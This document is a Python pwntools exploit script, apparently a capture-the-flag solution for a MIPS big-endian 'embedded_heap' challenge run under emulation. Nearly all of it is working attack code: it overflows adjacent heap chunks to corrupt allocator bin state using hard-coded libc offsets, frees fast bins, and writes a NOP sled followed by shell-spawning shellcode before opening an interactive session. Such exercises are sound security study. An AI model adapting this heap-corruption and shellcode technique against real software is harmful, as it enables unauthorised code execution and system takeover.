embeded.py

from pwn import *

context.update(arch='mips', endian='big')
sc = shellcraft

import sys

libc_mstate = 0x66d7c
libc_fn_off = 0x7f064

def chk_size(num):
    return max((num + 4 + 7) & ~7, 0x10)

def choice(ch):
    p.sendlineafter('Command: ', str(ch))


def update(ind, data):
    p.sendlineafter('Index: ', str(ind))
    p.sendlineafter('Size: ', str(len(data)))
    p.sendafter('Content: ', data)

def free(ind):
    p.sendlineafter('Index: ', str(ind))

def exploit():
    p.recvuntil(': ')
    a = chk_size(int(p.recvuntil(' bytes', drop=True)))
    p.recvuntil(': ')
    b = chk_size(int(p.recvuntil(' bytes', drop=True)))
    p.recvuntil(': ')
    c = chk_size(int(p.recvuntil(' bytes', drop=True)))

    # Overflow heap bins
    choice(1)
    ind = (libc_fn_off - (libc_mstate+4)) // 4 + 2
    overflow = 'a' * (a - 4) + p32(ind * 8)
    overflow += 'b' * (b - 4) + p32(9) + 'cccc'
    update(0, overflow)

    # Pwn, free the fast bins, and then write shellcode
    choice(3)
    free(2)
    free(1)
    pause()
    exp = asm(sc.nop()) * ((a // 4) - 2)
    exp += asm(sc.sh())
    update(0, exp)
    p.interactive()

def login():
    global tty
    tty = process('./run.sh')
    tty.recvuntil('login: ')
    tty.info('Got login screen')
    tty.sendline('root')
    tty.recvuntil('#')
    tty.success('Ready!')

if __name__ == '__main__':
    p = None
    try:
        if sys.argv[-1] == 'remote':
            p = remote('localhost', 1235)
        elif sys.argv[-1] == 'local':
            login()
            tty.sendline('/server 1235 /embedded_heap')
            p = remote('localhost', 1235)
        elif sys.argv[-1] == 'debug':
            login()
            tty.sendline('/server 1235 gdbserver 0.0.0.0:1234 /embedded_heap')
            p = remote('localhost', 1235)
        else:
            raise ValueError('Give an option')
    
        exploit()
    except:
        if p: p.interactive()
        raise